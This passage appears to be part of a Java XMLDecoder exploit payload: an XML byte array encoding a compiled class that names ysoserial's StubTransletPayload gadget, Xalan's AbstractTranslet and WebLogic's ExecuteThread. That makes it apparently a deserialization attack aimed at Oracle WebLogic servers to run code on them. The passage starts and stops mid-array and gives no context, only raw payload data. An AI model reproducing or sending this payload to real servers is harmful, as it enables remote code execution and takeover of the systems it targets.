index=\"1012\"><byte>110</byte></void><void index=\"1013\"><byte>100</byte></void><void index=\"1014\"><byte>108</byte></void><void index=\"1015\"><byte>101</byte></void><void index=\"1016\"><byte>114</byte></void><void index=\"1017\"><byte>59</byte></void><void index=\"1018\"><byte>1</byte></void><void index=\"1019\"><byte>0</byte></void><void index=\"1020\"><byte>10</byte></void><void index=\"1021\"><byte>69</byte></void><void index=\"1022\"><byte>120</byte></void><void index=\"1023\"><byte>99</byte></void><void index=\"1024\"><byte>101</byte></void><void index=\"1025\"><byte>112</byte></void><void index=\"1026\"><byte>116</byte></void><void index=\"1027\"><byte>105</byte></void><void index=\"1028\"><byte>111</byte></void><void index=\"1029\"><byte>110</byte></void><void index=\"1030\"><byte>115</byte></void><void index=\"1031\"><byte>7</byte></void><void index=\"1032\"><byte>0</byte></void><void index=\"1033\"><byte>39</byte></void><void index=\"1034\"><byte>1</byte></void><void index=\"1035\"><byte>0</byte></void><void index=\"1036\"><byte>-90</byte></void><void index=\"1037\"><byte>40</byte></void><void index=\"1038\"><byte>76</byte></void><void index=\"1039\"><byte>99</byte></void><void index=\"1040\"><byte>111</byte></void><void index=\"1041\"><byte>109</byte></void><void index=\"1042\"><byte>47</byte></void><void index=\"1043\"><byte>115</byte></void><void index=\"1044\"><byte>117</byte></void><void index=\"1045\"><byte>110</byte></void><void index=\"1046\"><byte>47</byte></void><void index=\"1047\"><byte>111</byte></void><void index=\"1048\"><byte>114</byte></void><void index=\"1049\"><byte>103</byte></void><void index=\"1050\"><byte>47</byte></void><void index=\"1051\"><byte>97</byte></void><void index=\"1052\"><byte>112</byte></void><void index=\"1053\"><byte>97</byte></void><void index=\"1054\"><byte>99</byte></void><void index=\"1055\"><byte>104</byte></void><void index=\"1056\"><byte>101</byte></void><void index=\"1057\"><byte>47</byte></void><void index=\"1058\"><byte>120</byte></void><void index=\"1059\"><byte>97</byte></void><void index=\"1060\"><byte>108</byte></void><void index=\"1061\"><byte>97</byte></void><void index=\"1062\"><byte>110</byte></void><void index=\"1063\"><byte>47</byte></void><void index=\"1064\"><byte>105</byte></void><void index=\"1065\"><byte>110</byte></void><void index=\"1066\"><byte>116</byte></void><void index=\"1067\"><byte>101</byte></void><void index=\"1068\"><byte>114</byte></void><void index=\"1069\"><byte>110</byte></void><void index=\"1070\"><byte>97</byte></void><void index=\"1071\"><byte>108</byte></void><void index=\"1072\"><byte>47</byte></void><void index=\"1073\"><byte>120</byte></void><void index=\"1074\"><byte>115</byte></void><void index=\"1075\"><byte>108</byte></void><void index=\"1076\"><byte>116</byte></void><void index=\"1077\"><byte>99</byte></void><void index=\"1078\"><byte>47</byte></void><void index=\"1079\"><byte>68</byte></void><void index=\"1080\"><byte>79</byte></void><void index=\"1081\"><byte>77</byte></void><void index=\"1082\"><byte>59</byte></void><void index=\"1083\"><byte>76</byte></void><void index=\"1084\"><byte>99</byte></void><void index=\"1085\"><byte>111</byte></void><void index=\"1086\"><byte>109</byte></void><void index=\"1087\"><byte>47</byte></void><void index=\"1088\"><byte>115</byte></void><void index=\"1089\"><byte>117</byte></void><void index=\"1090\"><byte>110</byte></void><void index=\"1091\"><byte>47</byte></void><void index=\"1092\"><byte>111</byte></void><void index=\"1093\"><byte>114</byte></void><void index=\"1094\"><byte>103</byte></void><void index=\"1095\"><byte>47</byte></void><void index=\"1096\"><byte>97</byte></void><void index=\"1097\"><byte>112</byte></void><void index=\"1098\"><byte>97</byte></void><void index=\"1099\"><byte>99</byte></void><void index=\"1100\"><byte>104</byte></void><void index=\"1101\"><byte>101</byte></void><void index=\"1102\"><byte>47</byte></void><void index=\"1103\"><byte>120</byte></void><void index=\"1104\"><byte>109</byte></void><void index=\"1105\"><byte>108</byte></void><void index=\"1106\"><byte>47</byte></void><void index=\"1107\"><byte>105</byte></void><void index=\"1108\"><byte>110</byte></void><void index=\"1109\"><byte>116</byte></void><void index=\"1110\"><byte>101</byte></void><void index=\"1111\"><byte>114</byte></void><void index=\"1112\"><byte>110</byte></void><void index=\"1113\"><byte>97</byte></void><void index=\"1114\"><byte>108</byte></void><void index=\"1115\"><byte>47</byte></void><void index=\"1116\"><byte>100</byte></void><void index=\"1117\"><byte>116</byte></void><void index=\"1118\"><byte>109</byte></void><void index=\"1119\"><byte>47</byte></void><void index=\"1120\"><byte>68</byte></void><void index=\"1121\"><byte>84</byte></void><void index=\"1122\"><byte>77</byte></void><void index=\"1123\"><byte>65</byte></void><void index=\"1124\"><byte>120</byte></void><void index=\"1125\"><byte>105</byte></void><void index=\"1126\"><byte>115</byte></void><void index=\"1127\"><byte>73</byte></void><void index=\"1128\"><byte>116</byte></void><void index=\"1129\"><byte>101</byte></void><void index=\"1130\"><byte>114</byte></void><void index=\"1131\"><byte>97</byte></void><void index=\"1132\"><byte>116</byte></void><void index=\"1133\"><byte>111</byte></void><void index=\"1134\"><byte>114</byte></void><void index=\"1135\"><byte>59</byte></void><void index=\"1136\"><byte>76</byte></void><void index=\"1137\"><byte>99</byte></void><void index=\"1138\"><byte>111</byte></void><void index=\"1139\"><byte>109</byte></void><void index=\"1140\"><byte>47</byte></void><void index=\"1141\"><byte>115</byte></void><void index=\"1142\"><byte>117</byte></void><void index=\"1143\"><byte>110</byte></void><void index=\"1144\"><byte>47</byte></void><void index=\"1145\"><byte>111</byte></void><void index=\"1146\"><byte>114</byte></void><void index=\"1147\"><byte>103</byte></void><void index=\"1148\"><byte>47</byte></void><void index=\"1149\"><byte>97</byte></void><void index=\"1150\"><byte>112</byte></void><void index=\"1151\"><byte>97</byte></void><void index=\"1152\"><byte>99</byte></void><void index=\"1153\"><byte>104</byte></void><void index=\"1154\"><byte>101</byte></void><void index=\"1155\"><byte>47</byte></void><void index=\"1156\"><byte>120</byte></void><void index=\"1157\"><byte>109</byte></void><void index=\"1158\"><byte>108</byte></void><void index=\"1159\"><byte>47</byte></void><void index=\"1160\"><byte>105</byte></void><void index=\"1161\"><byte>110</byte></void><void index=\"1162\"><byte>116</byte></void><void index=\"1163\"><byte>101</byte></void><void index=\"1164\"><byte>114</byte></void><void index=\"1165\"><byte>110</byte></void><void index=\"1166\"><byte>97</byte></void><void index=\"1167\"><byte>108</byte></void><void index=\"1168\"><byte>47</byte></void><void index=\"1169\"><byte>115</byte></void><void index=\"1170\"><byte>101</byte></void><void index=\"1171\"><byte>114</byte></void><void index=\"1172\"><byte>105</byte></void><void index=\"1173\"><byte>97</byte></void><void index=\"1174\"><byte>108</byte></void><void index=\"1175\"><byte>105</byte></void><void index=\"1176\"><byte>122</byte></void><void index=\"1177\"><byte>101</byte></void><void index=\"1178\"><byte>114</byte></void><void index=\"1179\"><byte>47</byte></void><void index=\"1180\"><byte>83</byte></void><void index=\"1181\"><byte>101</byte></void><void index=\"1182\"><byte>114</byte></void><void index=\"1183\"><byte>105</byte></void><void index=\"1184\"><byte>97</byte></void><void index=\"1185\"><byte>108</byte></void><void index=\"1186\"><byte>105</byte></void><void index=\"1187\"><byte>122</byte></void><void index=\"1188\"><byte>97</byte></void><void index=\"1189\"><byte>116</byte></void><void index=\"1190\"><byte>105</byte></void><void index=\"1191\"><byte>111</byte></void><void index=\"1192\"><byte>110</byte></void><void index=\"1193\"><byte>72</byte></void><void index=\"1194\"><byte>97</byte></void><void index=\"1195\"><byte>110</byte></void><void index=\"1196\"><byte>100</byte></void><void index=\"1197\"><byte>108</byte></void><void index=\"1198\"><byte>101</byte></void><void index=\"1199\"><byte>114</byte></void><void index=\"1200\"><byte>59</byte></void><void index=\"1201\"><byte>41</byte></void><void index=\"1202\"><byte>86</byte></void><void index=\"1203\"><byte>1</byte></void><void index=\"1204\"><byte>0</byte></void><void index=\"1205\"><byte>8</byte></void><void index=\"1206\"><byte>105</byte></void><void index=\"1207\"><byte>116</byte></void><void index=\"1208\"><byte>101</byte></void><void index=\"1209\"><byte>114</byte></void><void index=\"1210\"><byte>97</byte></void><void index=\"1211\"><byte>116</byte></void><void index=\"1212\"><byte>111</byte></void><void index=\"1213\"><byte>114</byte></void><void index=\"1214\"><byte>1</byte></void><void index=\"1215\"><byte>0</byte></void><void index=\"1216\"><byte>53</byte></void><void index=\"1217\"><byte>76</byte></void><void index=\"1218\"><byte>99</byte></void><void index=\"1219\"><byte>111</byte></void><void index=\"1220\"><byte>109</byte></void><void index=\"1221\"><byte>47</byte></void><void index=\"1222\"><byte>115</byte></void><void index=\"1223\"><byte>117</byte></void><void index=\"1224\"><byte>110</byte></void><void index=\"1225\"><byte>47</byte></void><void index=\"1226\"><byte>111</byte></void><void index=\"1227\"><byte>114</byte></void><void index=\"1228\"><byte>103</byte></void><void index=\"1229\"><byte>47</byte></void><void index=\"1230\"><byte>97</byte></void><void index=\"1231\"><byte>112</byte></void><void index=\"1232\"><byte>97</byte></void><void index=\"1233\"><byte>99</byte></void><void index=\"1234\"><byte>104</byte></void><void index=\"1235\"><byte>101</byte></void><void index=\"1236\"><byte>47</byte></void><void index=\"1237\"><byte>120</byte></void><void index=\"1238\"><byte>109</byte></void><void index=\"1239\"><byte>108</byte></void><void index=\"1240\"><byte>47</byte></void><void index=\"1241\"><byte>105</byte></void><void index=\"1242\"><byte>110</byte></void><void index=\"1243\"><byte>116</byte></void><void index=\"1244\"><byte>101</byte></void><void index=\"1245\"><byte>114</byte></void><void index=\"1246\"><byte>110</byte></void><void index=\"1247\"><byte>97</byte></void><void index=\"1248\"><byte>108</byte></void><void index=\"1249\"><byte>47</byte></void><void index=\"1250\"><byte>100</byte></void><void index=\"1251\"><byte>116</byte></void><void index=\"1252\"><byte>109</byte></void><void index=\"1253\"><byte>47</byte></void><void index=\"1254\"><byte>68</byte></void><void index=\"1255\"><byte>84</byte></void><void index=\"1256\"><byte>77</byte></void><void index=\"1257\"><byte>65</byte></void><void index=\"1258\"><byte>120</byte></void><void index=\"1259\"><byte>105</byte></void><void index=\"1260\"><byte>115</byte></void><void index=\"1261\"><byte>73</byte></void><void index=\"1262\"><byte>116</byte></void><void index=\"1263\"><byte>101</byte></void><void index=\"1264\"><byte>114</byte></void><void index=\"1265\"><byte>97</byte></void><void index=\"1266\"><byte>116</byte></void><void index=\"1267\"><byte>111</byte></void><void index=\"1268\"><byte>114</byte></void><void index=\"1269\"><byte>59</byte></void><void index=\"1270\"><byte>1</byte></void><void index=\"1271\"><byte>0</byte></void><void index=\"1272\"><byte>7</byte></void><void index=\"1273\"><byte>104</byte></void><void index=\"1274\"><byte>97</byte></void><void index=\"1275\"><byte>110</byte></void><void index=\"1276\"><byte>100</byte></void><void index=\"1277\"><byte>108</byte></void><void index=\"1278\"><byte>101</byte></void><void index=\"1279\"><byte>114</byte></void><void index=\"1280\"><byte>1</byte></void><void index=\"1281\"><byte>0</byte></void><void index=\"1282\"><byte>65</byte></void><void index=\"1283\"><byte>76</byte></void><void index=\"1284\"><byte>99</byte></void><void index=\"1285\"><byte>111</byte></void><void index=\"1286\"><byte>109</byte></void><void index=\"1287\"><byte>47</byte></void><void index=\"1288\"><byte>115</byte></void><void index=\"1289\"><byte>117</byte></void><void index=\"1290\"><byte>110</byte></void><void index=\"1291\"><byte>47</byte></void><void index=\"1292\"><byte>111</byte></void><void index=\"1293\"><byte>114</byte></void><void index=\"1294\"><byte>103</byte></void><void index=\"1295\"><byte>47</byte></void><void index=\"1296\"><byte>97</byte></void><void index=\"1297\"><byte>112</byte></void><void index=\"1298\"><byte>97</byte></void><void index=\"1299\"><byte>99</byte></void><void index=\"1300\"><byte>104</byte></void><void index=\"1301\"><byte>101</byte></void><void index=\"1302\"><byte>47</byte></void><void index=\"1303\"><byte>120</byte></void><void index=\"1304\"><byte>109</byte></void><void index=\"1305\"><byte>108</byte></void><void index=\"1306\"><byte>47</byte></void><void index=\"1307\"><byte>105</byte></void><void index=\"1308\"><byte>110</byte></void><void index=\"1309\"><byte>116</byte></void><void index=\"1310\"><byte>101</byte></void><void index=\"1311\"><byte>114</byte></void><void index=\"1312\"><byte>110</byte></void><void index=\"1313\"><byte>97</byte></void><void index=\"1314\"><byte>108</byte></void><void index=\"1315\"><byte>47</byte></void><void index=\"1316\"><byte>115</byte></void><void index=\"1317\"><byte>101</byte></void><void index=\"1318\"><byte>114</byte></void><void index=\"1319\"><byte>105</byte></void><void index=\"1320\"><byte>97</byte></void><void index=\"1321\"><byte>108</byte></void><void index=\"1322\"><byte>105</byte></void><void index=\"1323\"><byte>122</byte></void><void index=\"1324\"><byte>101</byte></void><void index=\"1325\"><byte>114</byte></void><void index=\"1326\"><byte>47</byte></void><void index=\"1327\"><byte>83</byte></void><void index=\"1328\"><byte>101</byte></void><void index=\"1329\"><byte>114</byte></void><void index=\"1330\"><byte>105</byte></void><void index=\"1331\"><byte>97</byte></void><void index=\"1332\"><byte>108</byte></void><void index=\"1333\"><byte>105</byte></void><void index=\"1334\"><byte>122</byte></void><void index=\"1335\"><byte>97</byte></void><void index=\"1336\"><byte>116</byte></void><void index=\"1337\"><byte>105</byte></void><void index=\"1338\"><byte>111</byte></void><void index=\"1339\"><byte>110</byte></void><void index=\"1340\"><byte>72</byte></void><void index=\"1341\"><byte>97</byte></void><void index=\"1342\"><byte>110</byte></void><void index=\"1343\"><byte>100</byte></void><void index=\"1344\"><byte>108</byte></void><void index=\"1345\"><byte>101</byte></void><void index=\"1346\"><byte>114</byte></void><void index=\"1347\"><byte>59</byte></void><void index=\"1348\"><byte>1</byte></void><void index=\"1349\"><byte>0</byte></void><void index=\"1350\"><byte>10</byte></void><void index=\"1351\"><byte>83</byte></void><void index=\"1352\"><byte>111</byte></void><void index=\"1353\"><byte>117</byte></void><void index=\"1354\"><byte>114</byte></void><void index=\"1355\"><byte>99</byte></void><void index=\"1356\"><byte>101</byte></void><void index=\"1357\"><byte>70</byte></void><void index=\"1358\"><byte>105</byte></void><void index=\"1359\"><byte>108</byte></void><void index=\"1360\"><byte>101</byte></void><void index=\"1361\"><byte>1</byte></void><void index=\"1362\"><byte>0</byte></void><void index=\"1363\"><byte>12</byte></void><void index=\"1364\"><byte>71</byte></void><void index=\"1365\"><byte>97</byte></void><void index=\"1366\"><byte>100</byte></void><void index=\"1367\"><byte>103</byte></void><void index=\"1368\"><byte>101</byte></void><void index=\"1369\"><byte>116</byte></void><void index=\"1370\"><byte>115</byte></void><void index=\"1371\"><byte>46</byte></void><void index=\"1372\"><byte>106</byte></void><void index=\"1373\"><byte>97</byte></void><void index=\"1374\"><byte>118</byte></void><void index=\"1375\"><byte>97</byte></void><void index=\"1376\"><byte>12</byte></void><void index=\"1377\"><byte>0</byte></void><void index=\"1378\"><byte>10</byte></void><void index=\"1379\"><byte>0</byte></void><void index=\"1380\"><byte>11</byte></void><void index=\"1381\"><byte>7</byte></void><void index=\"1382\"><byte>0</byte></void><void index=\"1383\"><byte>40</byte></void><void index=\"1384\"><byte>1</byte></void><void index=\"1385\"><byte>0</byte></void><void index=\"1386\"><byte>51</byte></void><void index=\"1387\"><byte>121</byte></void><void index=\"1388\"><byte>115</byte></void><void index=\"1389\"><byte>111</byte></void><void index=\"1390\"><byte>115</byte></void><void index=\"1391\"><byte>101</byte></void><void index=\"1392\"><byte>114</byte></void><void index=\"1393\"><byte>105</byte></void><void index=\"1394\"><byte>97</byte></void><void index=\"1395\"><byte>108</byte></void><void index=\"1396\"><byte>47</byte></void><void index=\"1397\"><byte>112</byte></void><void index=\"1398\"><byte>97</byte></void><void index=\"1399\"><byte>121</byte></void><void index=\"1400\"><byte>108</byte></void><void index=\"1401\"><byte>111</byte></void><void index=\"1402\"><byte>97</byte></void><void index=\"1403\"><byte>100</byte></void><void index=\"1404\"><byte>115</byte></void><void index=\"1405\"><byte>47</byte></void><void index=\"1406\"><byte>117</byte></void><void index=\"1407\"><byte>116</byte></void><void index=\"1408\"><byte>105</byte></void><void index=\"1409\"><byte>108</byte></void><void index=\"1410\"><byte>47</byte></void><void index=\"1411\"><byte>71</byte></void><void index=\"1412\"><byte>97</byte></void><void index=\"1413\"><byte>100</byte></void><void index=\"1414\"><byte>103</byte></void><void index=\"1415\"><byte>101</byte></void><void index=\"1416\"><byte>116</byte></void><void index=\"1417\"><byte>115</byte></void><void index=\"1418\"><byte>36</byte></void><void index=\"1419\"><byte>83</byte></void><void index=\"1420\"><byte>116</byte></void><void index=\"1421\"><byte>117</byte></void><void index=\"1422\"><byte>98</byte></void><void index=\"1423\"><byte>84</byte></void><void index=\"1424\"><byte>114</byte></void><void index=\"1425\"><byte>97</byte></void><void index=\"1426\"><byte>110</byte></void><void index=\"1427\"><byte>115</byte></void><void index=\"1428\"><byte>108</byte></void><void index=\"1429\"><byte>101</byte></void><void index=\"1430\"><byte>116</byte></void><void index=\"1431\"><byte>80</byte></void><void index=\"1432\"><byte>97</byte></void><void index=\"1433\"><byte>121</byte></void><void index=\"1434\"><byte>108</byte></void><void index=\"1435\"><byte>111</byte></void><void index=\"1436\"><byte>97</byte></void><void index=\"1437\"><byte>100</byte></void><void index=\"1438\"><byte>1</byte></void><void index=\"1439\"><byte>0</byte></void><void index=\"1440\"><byte>64</byte></void><void index=\"1441\"><byte>99</byte></void><void index=\"1442\"><byte>111</byte></void><void index=\"1443\"><byte>109</byte></void><void index=\"1444\"><byte>47</byte></void><void index=\"1445\"><byte>115</byte></void><void index=\"1446\"><byte>117</byte></void><void index=\"1447\"><byte>110</byte></void><void index=\"1448\"><byte>47</byte></void><void index=\"1449\"><byte>111</byte></void><void index=\"1450\"><byte>114</byte></void><void index=\"1451\"><byte>103</byte></void><void index=\"1452\"><byte>47</byte></void><void index=\"1453\"><byte>97</byte></void><void index=\"1454\"><byte>112</byte></void><void index=\"1455\"><byte>97</byte></void><void index=\"1456\"><byte>99</byte></void><void index=\"1457\"><byte>104</byte></void><void index=\"1458\"><byte>101</byte></void><void index=\"1459\"><byte>47</byte></void><void index=\"1460\"><byte>120</byte></void><void index=\"1461\"><byte>97</byte></void><void index=\"1462\"><byte>108</byte></void><void index=\"1463\"><byte>97</byte></void><void index=\"1464\"><byte>110</byte></void><void index=\"1465\"><byte>47</byte></void><void index=\"1466\"><byte>105</byte></void><void index=\"1467\"><byte>110</byte></void><void index=\"1468\"><byte>116</byte></void><void index=\"1469\"><byte>101</byte></void><void index=\"1470\"><byte>114</byte></void><void index=\"1471\"><byte>110</byte></void><void index=\"1472\"><byte>97</byte></void><void index=\"1473\"><byte>108</byte></void><void index=\"1474\"><byte>47</byte></void><void index=\"1475\"><byte>120</byte></void><void index=\"1476\"><byte>115</byte></void><void index=\"1477\"><byte>108</byte></void><void index=\"1478\"><byte>116</byte></void><void index=\"1479\"><byte>99</byte></void><void index=\"1480\"><byte>47</byte></void><void index=\"1481\"><byte>114</byte></void><void index=\"1482\"><byte>117</byte></void><void index=\"1483\"><byte>110</byte></void><void index=\"1484\"><byte>116</byte></void><void index=\"1485\"><byte>105</byte></void><void index=\"1486\"><byte>109</byte></void><void index=\"1487\"><byte>101</byte></void><void index=\"1488\"><byte>47</byte></void><void index=\"1489\"><byte>65</byte></void><void index=\"1490\"><byte>98</byte></void><void index=\"1491\"><byte>115</byte></void><void index=\"1492\"><byte>116</byte></void><void index=\"1493\"><byte>114</byte></void><void index=\"1494\"><byte>97</byte></void><void index=\"1495\"><byte>99</byte></void><void index=\"1496\"><byte>116</byte></void><void index=\"1497\"><byte>84</byte></void><void index=\"1498\"><byte>114</byte></void><void index=\"1499\"><byte>97</byte></void><void index=\"1500\"><byte>110</byte></void><void index=\"1501\"><byte>115</byte></void><void index=\"1502\"><byte>108</byte></void><void index=\"1503\"><byte>101</byte></void><void index=\"1504\"><byte>116</byte></void><void index=\"1505\"><byte>1</byte></void><void index=\"1506\"><byte>0</byte></void><void index=\"1507\"><byte>20</byte></void><void index=\"1508\"><byte>106</byte></void><void index=\"1509\"><byte>97</byte></void><void index=\"1510\"><byte>118</byte></void><void index=\"1511\"><byte>97</byte></void><void index=\"1512\"><byte>47</byte></void><void index=\"1513\"><byte>105</byte></void><void index=\"1514\"><byte>111</byte></void><void index=\"1515\"><byte>47</byte></void><void index=\"1516\"><byte>83</byte></void><void index=\"1517\"><byte>101</byte></void><void index=\"1518\"><byte>114</byte></void><void index=\"1519\"><byte>105</byte></void><void index=\"1520\"><byte>97</byte></void><void index=\"1521\"><byte>108</byte></void><void index=\"1522\"><byte>105</byte></void><void index=\"1523\"><byte>122</byte></void><void index=\"1524\"><byte>97</byte></void><void index=\"1525\"><byte>98</byte></void><void index=\"1526\"><byte>108</byte></void><void index=\"1527\"><byte>101</byte></void><void index=\"1528\"><byte>1</byte></void><void index=\"1529\"><byte>0</byte></void><void index=\"1530\"><byte>57</byte></void><void index=\"1531\"><byte>99</byte></void><void index=\"1532\"><byte>111</byte></void><void index=\"1533\"><byte>109</byte></void><void index=\"1534\"><byte>47</byte></void><void index=\"1535\"><byte>115</byte></void><void index=\"1536\"><byte>117</byte></void><void index=\"1537\"><byte>110</byte></void><void index=\"1538\"><byte>47</byte></void><void index=\"1539\"><byte>111</byte></void><void index=\"1540\"><byte>114</byte></void><void index=\"1541\"><byte>103</byte></void><void index=\"1542\"><byte>47</byte></void><void index=\"1543\"><byte>97</byte></void><void index=\"1544\"><byte>112</byte></void><void index=\"1545\"><byte>97</byte></void><void index=\"1546\"><byte>99</byte></void><void index=\"1547\"><byte>104</byte></void><void index=\"1548\"><byte>101</byte></void><void index=\"1549\"><byte>47</byte></void><void index=\"1550\"><byte>120</byte></void><void index=\"1551\"><byte>97</byte></void><void index=\"1552\"><byte>108</byte></void><void index=\"1553\"><byte>97</byte></void><void index=\"1554\"><byte>110</byte></void><void index=\"1555\"><byte>47</byte></void><void index=\"1556\"><byte>105</byte></void><void index=\"1557\"><byte>110</byte></void><void index=\"1558\"><byte>116</byte></void><void index=\"1559\"><byte>101</byte></void><void index=\"1560\"><byte>114</byte></void><void index=\"1561\"><byte>110</byte></void><void index=\"1562\"><byte>97</byte></void><void index=\"1563\"><byte>108</byte></void><void index=\"1564\"><byte>47</byte></void><void index=\"1565\"><byte>120</byte></void><void index=\"1566\"><byte>115</byte></void><void index=\"1567\"><byte>108</byte></void><void index=\"1568\"><byte>116</byte></void><void index=\"1569\"><byte>99</byte></void><void index=\"1570\"><byte>47</byte></void><void index=\"1571\"><byte>84</byte></void><void index=\"1572\"><byte>114</byte></void><void index=\"1573\"><byte>97</byte></void><void index=\"1574\"><byte>110</byte></void><void index=\"1575\"><byte>115</byte></void><void index=\"1576\"><byte>108</byte></void><void index=\"1577\"><byte>101</byte></void><void index=\"1578\"><byte>116</byte></void><void index=\"1579\"><byte>69</byte></void><void index=\"1580\"><byte>120</byte></void><void index=\"1581\"><byte>99</byte></void><void index=\"1582\"><byte>101</byte></void><void index=\"1583\"><byte>112</byte></void><void index=\"1584\"><byte>116</byte></void><void index=\"1585\"><byte>105</byte></void><void index=\"1586\"><byte>111</byte></void><void index=\"1587\"><byte>110</byte></void><void index=\"1588\"><byte>1</byte></void><void index=\"1589\"><byte>0</byte></void><void index=\"1590\"><byte>31</byte></void><void index=\"1591\"><byte>121</byte></void><void index=\"1592\"><byte>115</byte></void><void index=\"1593\"><byte>111</byte></void><void index=\"1594\"><byte>115</byte></void><void index=\"1595\"><byte>101</byte></void><void index=\"1596\"><byte>114</byte></void><void index=\"1597\"><byte>105</byte></void><void index=\"1598\"><byte>97</byte></void><void index=\"1599\"><byte>108</byte></void><void index=\"1600\"><byte>47</byte></void><void index=\"1601\"><byte>112</byte></void><void index=\"1602\"><byte>97</byte></void><void index=\"1603\"><byte>121</byte></void><void index=\"1604\"><byte>108</byte></void><void index=\"1605\"><byte>111</byte></void><void index=\"1606\"><byte>97</byte></void><void index=\"1607\"><byte>100</byte></void><void index=\"1608\"><byte>115</byte></void><void index=\"1609\"><byte>47</byte></void><void index=\"1610\"><byte>117</byte></void><void index=\"1611\"><byte>116</byte></void><void index=\"1612\"><byte>105</byte></void><void index=\"1613\"><byte>108</byte></void><void index=\"1614\"><byte>47</byte></void><void index=\"1615\"><byte>71</byte></void><void index=\"1616\"><byte>97</byte></void><void index=\"1617\"><byte>100</byte></void><void index=\"1618\"><byte>103</byte></void><void index=\"1619\"><byte>101</byte></void><void index=\"1620\"><byte>116</byte></void><void index=\"1621\"><byte>115</byte></void><void index=\"1622\"><byte>1</byte></void><void index=\"1623\"><byte>0</byte></void><void index=\"1624\"><byte>8</byte></void><void index=\"1625\"><byte>60</byte></void><void index=\"1626\"><byte>99</byte></void><void index=\"1627\"><byte>108</byte></void><void index=\"1628\"><byte>105</byte></void><void index=\"1629\"><byte>110</byte></void><void index=\"1630\"><byte>105</byte></void><void index=\"1631\"><byte>116</byte></void><void index=\"1632\"><byte>62</byte></void><void index=\"1633\"><byte>1</byte></void><void index=\"1634\"><byte>0</byte></void><void index=\"1635\"><byte>16</byte></void><void index=\"1636\"><byte>106</byte></void><void index=\"1637\"><byte>97</byte></void><void index=\"1638\"><byte>118</byte></void><void index=\"1639\"><byte>97</byte></void><void index=\"1640\"><byte>47</byte></void><void index=\"1641\"><byte>108</byte></void><void index=\"1642\"><byte>97</byte></void><void index=\"1643\"><byte>110</byte></void><void index=\"1644\"><byte>103</byte></void><void index=\"1645\"><byte>47</byte></void><void index=\"1646\"><byte>84</byte></void><void index=\"1647\"><byte>104</byte></void><void index=\"1648\"><byte>114</byte></void><void index=\"1649\"><byte>101</byte></void><void index=\"1650\"><byte>97</byte></void><void index=\"1651\"><byte>100</byte></void><void index=\"1652\"><byte>7</byte></void><void index=\"1653\"><byte>0</byte></void><void index=\"1654\"><byte>42</byte></void><void index=\"1655\"><byte>1</byte></void><void index=\"1656\"><byte>0</byte></void><void index=\"1657\"><byte>13</byte></void><void index=\"1658\"><byte>99</byte></void><void index=\"1659\"><byte>117</byte></void><void index=\"1660\"><byte>114</byte></void><void index=\"1661\"><byte>114</byte></void><void index=\"1662\"><byte>101</byte></void><void index=\"1663\"><byte>110</byte></void><void index=\"1664\"><byte>116</byte></void><void index=\"1665\"><byte>84</byte></void><void index=\"1666\"><byte>104</byte></void><void index=\"1667\"><byte>114</byte></void><void index=\"1668\"><byte>101</byte></void><void index=\"1669\"><byte>97</byte></void><void index=\"1670\"><byte>100</byte></void><void index=\"1671\"><byte>1</byte></void><void index=\"1672\"><byte>0</byte></void><void index=\"1673\"><byte>20</byte></void><void index=\"1674\"><byte>40</byte></void><void index=\"1675\"><byte>41</byte></void><void index=\"1676\"><byte>76</byte></void><void index=\"1677\"><byte>106</byte></void><void index=\"1678\"><byte>97</byte></void><void index=\"1679\"><byte>118</byte></void><void index=\"1680\"><byte>97</byte></void><void index=\"1681\"><byte>47</byte></void><void index=\"1682\"><byte>108</byte></void><void index=\"1683\"><byte>97</byte></void><void index=\"1684\"><byte>110</byte></void><void index=\"1685\"><byte>103</byte></void><void index=\"1686\"><byte>47</byte></void><void index=\"1687\"><byte>84</byte></void><void index=\"1688\"><byte>104</byte></void><void index=\"1689\"><byte>114</byte></void><void index=\"1690\"><byte>101</byte></void><void index=\"1691\"><byte>97</byte></void><void index=\"1692\"><byte>100</byte></void><void index=\"1693\"><byte>59</byte></void><void index=\"1694\"><byte>12</byte></void><void index=\"1695\"><byte>0</byte></void><void index=\"1696\"><byte>44</byte></void><void index=\"1697\"><byte>0</byte></void><void index=\"1698\"><byte>45</byte></void><void index=\"1699\"><byte>10</byte></void><void index=\"1700\"><byte>0</byte></void><void index=\"1701\"><byte>43</byte></void><void index=\"1702\"><byte>0</byte></void><void index=\"1703\"><byte>46</byte></void><void index=\"1704\"><byte>1</byte></void><void index=\"1705\"><byte>0</byte></void><void index=\"1706\"><byte>27</byte></void><void index=\"1707\"><byte>119</byte></void><void index=\"1708\"><byte>101</byte></void><void index=\"1709\"><byte>98</byte></void><void index=\"1710\"><byte>108</byte></void><void index=\"1711\"><byte>111</byte></void><void index=\"1712\"><byte>103</byte></void><void index=\"1713\"><byte>105</byte></void><void index=\"1714\"><byte>99</byte></void><void index=\"1715\"><byte>47</byte></void><void index=\"1716\"><byte>119</byte></void><void index=\"1717\"><byte>111</byte></void><void index=\"1718\"><byte>114</byte></void><void index=\"1719\"><byte>107</byte></void><void index=\"1720\"><byte>47</byte></void><void index=\"1721\"><byte>69</byte></void><void index=\"1722\"><byte>120</byte></void><void index=\"1723\"><byte>101</byte></void><void index=\"1724\"><byte>99</byte></void><void index=\"1725\"><byte>117</byte></void><void index=\"1726\"><byte>116</byte></void><void index=\"1727\"><byte>101</byte></void><void index=\"1728\"><byte>84</byte></void><void index=\"1729\"><byte>104</byte></void><void index=\"1730\"><byte>114</byte></void><void index=\"1731\"><byte>101</byte></void><void index=\"1732\"><byte>97</byte></void><void index=\"1733\"><byte>100</byte></void><void index=\"1734\"><byte>7</byte></void><void index=\"1735\"><byte>0</byte></void><void index=\"1736\"><byte>48</byte></void><void index=\"1737\"><byte>1</byte></void><void index=\"1738\"><byte>0</byte></void><void index=\"1739\"><byte>14</byte></void><void index=\"1740\"><byte>103</byte></void><void index=\"1741\"><byte>101</byte></void><void index=\"1742\"><byte>116</byte></void><void index=\"1743\"><byte>67</byte></void><void index=\"1744\"><byte>117</byte></void><void index=\"1745\"><byte>114</byte></void><void index=\"1746\"><byte>114</byte></void><void index=\"1747\"><byte>101</byte></void><void index=\"1748\"><byte>110</byte></void><void index=\"1749\"><byte>116</byte></void><void index=\"1750\"><byte>87</byte></void><void index=\"1751\"><byte>111</byte></void><void index=\"1752\"><byte>114</byte></void><void index=\"1753\"><byte>107</byte></void><void index=\"1754\"><byte>1</byte></void><void index=\"1755\"><byte>0</byte></void><void index=\"1756\"><byte>29</byte></void><void index=\"1757\"><byte>40</byte></void><void index=\"1758\"><byte>41</byte></void><void index=\"1759\"><byte>76</byte></void><void index=\"1760\"><byte>119</byte></void><void 